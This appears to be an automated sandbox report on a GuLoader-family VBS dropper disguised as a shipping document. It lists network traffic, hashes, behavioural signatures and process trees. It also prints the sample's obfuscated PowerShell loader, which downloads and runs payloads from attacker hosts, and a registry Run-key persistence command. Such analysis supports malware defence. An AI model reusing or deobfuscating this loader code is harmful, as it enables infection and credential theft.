un.labl Telefo: ummertBTroloveeFakticir .esvrlibudg tslKassebgdUdgiftssElektro=Mistill$ Zamar,UOutbo,ir PestereGau.sfid Knarkee evaport T resn.ElixatisNoninteu OphidsbCuticulsN,ncommtinvent rSp.rrowiPsykotene,evatogRitu,li( Penepl$ ci iusFF,nansloHydrolorBrndk mlMelolonnTrst,trg.kftedeeSankthalDia,kopsS,beslaeF ockres enckesl MaadenoSwazilnvAngelihsSalgsch,Lutoses$NattelyuAs icsmdco,certeComputenSlvtjsslPostulaanontra.nHj.rnevdEncolors AnguludR,eoptaa mmersenParrings afspilkErkendeeSinopiarKorr,mpnGulfedpeTonomet)grund t ');Xylyl $Berilds;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Contributors.Pap && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Slidfladerne" /t REG_EXPAND_SZ /d "%Skovbyggelinjernes% -w 1 $Slutvrdier=(Get-ItemProperty -Path 'HKCU:\Rewets\').Cavilingness;%Skovbyggelinjernes% ($Slutvrdier)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Slidfladerne" /t REG_EXPAND_SZ /d "%Skovbyggelinjernes% -w 1 $Slutvrdier=(Get-ItemProperty -Path 'HKCU:\Rewets\').Cavilingness;%Skovbyggelinjernes% ($Slutvrdier)"

Network

Country Destination Domain Proto
US 8.8.8.8:53 6777.6777.6777.677e udp
US 8.8.8.8:53 cadenaderegalos.com udp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 8.8.8.8:53 madibarohilalatwo.duckdns.org udp
DE 84.247.187.12:80 madibarohilalatwo.duckdns.org tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 tcp
US 198.49.68.125:443 tcp

Files

memory/2612-4-0x000007FEF5F4E000-0x000007FEF5F4F000-memory.dmp

memory/2612-5-0x000000001B750000-0x000000001BA32000-memory.dmp

memory/2612-6-0x0000000001F50000-0x0000000001F58000-memory.dmp

memory/2612-7-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

memory/2612-9-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

memory/2612-8-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1NE92LMC8BK2XWEVM1LD.temp

MD5 37568a484225754c447b944083c059ef
SHA1 aef4a7192518d1f70854569451fc678d936f0f05
SHA256 49448ec9cab2abe971568c418817850d73ab2906ed2d50cdd6086d3666f08957
SHA512 d18e88526dcb2c8d3a993a6cd8959b87805b6158350c4bc430febf67654a4cf368a4363b4277b988a3f10e2690c69748b877604173c4ce108b31607b2166a2af

C:\Users\Admin\AppData\Roaming\Contributors.Pap

MD5 6d3d810b1b531a393dd8a200f17378b8
SHA1 bc31c057297d2b467a46d843030f1ff377f55f1e
SHA256 786447c3a5269cec661eb9e7bea51a58df805afaceb116677ff1974cc0d6d7df
SHA512 a77ecb7cc1d0bb183fdef43747f7156bd72e5fcb32e2e8c7671a926707b313245e08b682ce03b6b862f9f4ff1f62cf566d98fbde3384c67b60c0a2cb8dcbf358

memory/2612-15-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

memory/2480-16-0x00000000065F0000-0x0000000007AE1000-memory.dmp

memory/2612-17-0x000007FEF5F4E000-0x000007FEF5F4F000-memory.dmp

memory/2852-19-0x00000000005B0000-0x0000000001612000-memory.dmp

memory/2612-26-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-21 13:12

Reported

2024-05-21 13:14

Platform

win10v2004-20240508-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Shipping document.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Program Files (x86)\windows mail\wab.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Slidfladerne = "%Skovbyggelinjernes% -w 1 $Slutvrdier=(Get-ItemProperty -Path 'HKCU:\\Rewets\\').Cavilingness;%Skovbyggelinjernes% ($Slutvrdier)" C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2304 wrote to memory of 776 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2304 wrote to memory of 776 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 776 wrote to memory of 4260 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 776 wrote to memory of 4260 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2304 wrote to memory of 260 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2304 wrote to memory of 260 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 260 wrote to memory of 2384 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 260 wrote to memory of 2384 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 260 wrote to memory of 1640 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 260 wrote to memory of 1640 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 260 wrote to memory of 1640 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 3732 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1640 wrote to memory of 3732 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1640 wrote to memory of 3732 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1640 wrote to memory of 4504 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1640 wrote to memory of 4504 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1640 wrote to memory of 4504 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1640 wrote to memory of 4504 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1640 wrote to memory of 4504 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4504 wrote to memory of 4456 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 4504 wrote to memory of 4456 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 4504 wrote to memory of 4456 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 4456 wrote to memory of 3464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4456 wrote to memory of 3464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4456 wrote to memory of 3464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4504 wrote to memory of 4216 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4504 wrote to memory of 4216 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4504 wrote to memory of 4216 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4504 wrote to memory of 4216 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4504 wrote to memory of 2604 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4504 wrote to memory of 2604 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4504 wrote to memory of 2604 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4504 wrote to memory of 2604 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4504 wrote to memory of 4696 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4504 wrote to memory of 4696 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4504 wrote to memory of 4696 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4504 wrote to memory of 4696 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Shipping document.vbs"

C:\Windows\System32\cmd.exe

cmd.exe /c ping 6777.6777.6777.677e

C:\Windows\system32\PING.EXE

ping 6777.6777.6777.677e

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Undialyzeds = 1;$Forespeech='Sub';$Forespeech+='strin';$Forespeech+='g';Function Mikado($Firebolted){$Martyrologic=$Firebolted.Length-$Undialyzeds;For($Femalizes49=7;$Femalizes49 -lt $Martyrologic;$Femalizes49+=8){$Trompetdyrenes+=$Firebolted.$Forespeech.Invoke( $Femalizes49, $Undialyzeds);}$Trompetdyrenes;}function Xylyl($nougats){. ($Sprinklervsken) ($nougats);}$Guilts=Mikado 'MisbirtMm alretoOblongiz MustafiEnglevilAfkol,nl Larigoa.alteri/Metagna5 Stab.l. egions0Asbku,h Untaun.(BelejriWAssociaiUdviklin bagestdRutscheoGejstliwSagsgansBlokpol IndonesNLaboratTo forme L.isure1,ladtan0 Ran.or.Apertne0rodknol;Sultegr algesi.W S,riveiAddi,ten Lin eb6Do.atio4Elaph.d;St.vnsb Enc,untxSeed ng6 ,ogica4Adiposi;Kvindes FutilizrRugbrdsv Transi: Nongol1Bun tsd2 Denoun1Bortdmm. Me,red0Opkalds)Delites arbejdsGPalaeogeArchesic,ekognoktkkendeoUpassel/Rouil.e2Spirant0Photote1Slutpun0eftertr0 Stumbl1Hu dehu0Recitat1Hjlpe,n elsenfFGossa ei SimultrUberegneIndeksefWharfraoAftalevx To.sio/Forvalt1Painles2Drivers1I,dsmig.Cocksho0Tantiem ';$Fuldbragtes=Mikado ' ImerinUForegris Redeareti.balerJunkboa-Bon.sesACatchm gSi kerheModer,inForrykttPletter ';$Spinituberculate=Mikado ' BrndemhIndividtindsendt BankospPau,eris.nnovat:Balleti/Fossaeu/V,lfundc Al inaa OddlegdKostskoeBlokadenSeend saAmatrskdCult kle GummibrOrangeaeO,tendegBogiemaaNy etipl.ositiooCardioms.envisn.Debtorsc GravhjoNonpuebm Endoph/Ti,glysTKlbebaaoMisderiicarcasslAdresseeFilmogrtSemicelp Fil,inaSjlsr.apEkspedii .aabenr Ol,gis.Rooti.rdRispendeHumpssaptevarmel Geestso LgnersyInbitsb>Universh,ogonghtSy,kemat An,etlp Chempa:Kommpre/ Melipo/ Anderum HysteraDiabetedKammendiJefest.bVetiveraThrowworStaalvroPlacenthInnuendiGlitr tl Paral.aFortonel Glairea,mmutabt,ontradwNonprodoHunde l. Futurod tudercu Mudredcover,igkDe.angsd Macrocnpho.osks verflu.Tbrudsso To.seirRadiovigBrasero/VolitioaVrvlehilAllainelTotalsy/PhrynidTEtymo oo Roque.i,nterkolFilialseAfviklit UdaandpJentjenaHjertevpChackeri DividerEskadre.AntisufdNonst meCater.npbackbitlFreestooUnpoisey,urstpa ';$Smedningens=Mikado 'Unbutto> Indici ';$Sprinklervsken=Mikado 'KontokbiVolumeteHemihe.x Slingr ';$Cagot='Dockizations60';$Tilskring = Mikado ' K,stnieJan.lerc Bra.dahHande.so Chapta Expansi%Vir uela Elatc p RoughcpPanegy,dsellehyaD.imonitinitialaAchroni%Novelet\ osenstCinhivemo DissennK nnikktParfumergraver,iLsegldeb Cod.scu Starquthamrendo Gas etr Rve agsOlibanu.EpichilPHopeiteaUudslukpscuttl. Th,race&Brysth,&Outrefo El borae ProgracBrnesprhHulsle o Witlos plackletAmphirh ';Xylyl (Mikado 'Endolys$CimbrisgWispliklVirkeliopolitikbD,trugcaBgede elKotylef: Dext,if Bl.stoiKroatisrSnow owe ,ignalbParenthoH,idlgeoSenioretDishono=.vyunde(Se nmshc JunglemStarrind Flush. Snuptag/Unenwovc.cicula Supergr$EnsformTR sideniSedlersl Essayes TrammikBotulinrEphebeuiAr.ejdsn DerivegScrimwi)Subclam ');Xylyl (Mikado 'Hyper,c$ Erotisg .rikkelSubd.ntoMesa.icb Blokada Sy,axalIrascib:Bug,hypDBice,tri BagtrasJenmakekMicr tyoTransakgOp,oegerFakticia Jeaporf KroniniViljenssFru.tlekSjattefelegemulsj.gtpro=Jellstu$PamphleSForsinkpChalleni MegalenToralhaiGennembtHumo riuSubd,vibUneffigeSk,ltonr.gsvinbc IlioisuAr,enohlMass oraGent getAcalycae F lset. VenstrsAlmenvepBor,deslEls,liniTopske.t.layful(Thermof$Ud.andsS Car.urmGalvanoeShillald P ogrenMateriaiDurriesnA.arerngEjendomeProtoclnStueflus reatta)Indisti ');$Spinituberculate=$Diskografiskes[0];$Illegitimated= (Mikado ' Immite$o ercrigEngramblDraughtoWharfsibShippi aRauwolflSh mpoo:Li.ehooE UnsecllTourellePenitencAtionertAntimonropflgnioTruebludIndavlei Tav.rna InterilInklu,eyOmvekslzSedimene DebatsrTi skri=ReekspoNNedmejneS ltierw Rustvo-Alchem O ntioxibFlja,tejEnchanteSchizo c Pourbot E curs su,keneSNon,oveyMicawbesSaturnitHormonoeOverprim undive.TrsklerNmateriaeNringentTythesr.T,pefliWNyreligeM,nkesmbDeaminaCNaringil stubblirhagioneCheilodnBrugermt');$Illegitimated+=$fireboot[1];Xylyl ($Illegitimated);Xylyl (Mikado 'Englify$Dift,ngE Orni hlVilkaareTr,nsmicSelvk,et aggadirUndtageoTraadkudGentiliiPortr,tapalliatlSor.kjoyTilstrbzEksercie Draftsrunnomin.AfsendeH Rapp leAeroplaaPrangerdPersoniePlanc.er Snitsls ,lektr[Journal$ lcladhFAeonicauFripladlladdersdi,nisatbIntemper,vershoabum,sybgNglepert Subro,eOpisthosA,strin]Jaz,eta= ibrop$,lettebGUnde,feu Reph ti Ansv,rl PassivtScabbiesAnsgnin ');$Akrobat=Mikado ' skamfe$SmadrenESvmmendlForslageDevastecStnkpudtRhamnusr Isobu,odiagonadPeduncliUnstrenaFilatellUnwithdyIxodidszMgtediseNonaccrr.atapho.SystemaD sdvaneoKittieswVerse tnBrs frolHjesteroKorr,spaFjervgtdAf.temnFRastestiArkfde,lCr,dworeMithrai(Supiner$BestignSVristrep omdoebiPro,ptenBlindg,i PapirbtRetouc u,unkersbFejlbehe ayerdorSprogvicOverlreu fontinlGoyetiaaUnmedictReedlikeanattaf,Billard$SkeetbrN FurrileRecursidCydippegSeid mrrSapropeaNoege,hvAtt.akt)Marmo p ';$Nedgrav=$fireboot[0];Xylyl (Mikado 'Udso gt$Fly tengUn,nhablT,talssoBaarebub ScowedaSemikollDa idsf:Omf,rmaLC.orouseProgra.jKajakkeeKarbidlvAutoex rBevidstd PizziciStrong e Mis ikrB,ddestnu derhoeSnashessQual.ag1Malerin2Antithe9Incompr= Onc ov(coron.tTRyghvireFolkekusskubor,tHesitat-InformaPmismateaeksistetReequiphOfayscr Landsk$Trff.lsNFlyvereeAdo 